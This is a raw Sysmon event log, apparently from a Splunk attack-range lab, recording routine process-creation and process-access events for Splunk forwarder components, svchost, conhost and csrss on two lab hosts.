23542300x8000000000000000284792Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:48.344{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FD8AA87FCCCC5F9E31F8FD4A8C09AB0,SHA256=40C4912E3076C8B4A3666EF5CE652B25DED39D10C49CF0746A860F963ACB290C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213878Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:48.105{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0DC8-6216-EA03-000000003902}3420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213877Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:48.105{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213876Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:48.105{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213875Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:48.105{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213874Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:48.105{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213873Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:48.105{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213872Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:48.105{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213871Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:48.105{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213870Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:48.105{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213869Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:48.105{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213868Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:48.105{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-0DC8-6216-EA03-000000003902}3420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213867Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:48.105{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0DC8-6216-EA03-000000003902}3420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213866Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:48.106{4F8D34B0-0DC8-6216-EA03-000000003902}3420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000213908Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.823{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0DC9-6216-EC03-000000003902}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213907Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.823{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213906Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.823{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213905Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.823{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213904Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.823{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213903Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.823{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213902Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.823{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213901Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.823{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213900Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.823{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213899Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.823{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213898Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.823{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0DC9-6216-EC03-000000003902}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213897Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.823{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0DC9-6216-EC03-000000003902}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213896Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.824{4F8D34B0-0DC9-6216-EC03-000000003902}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 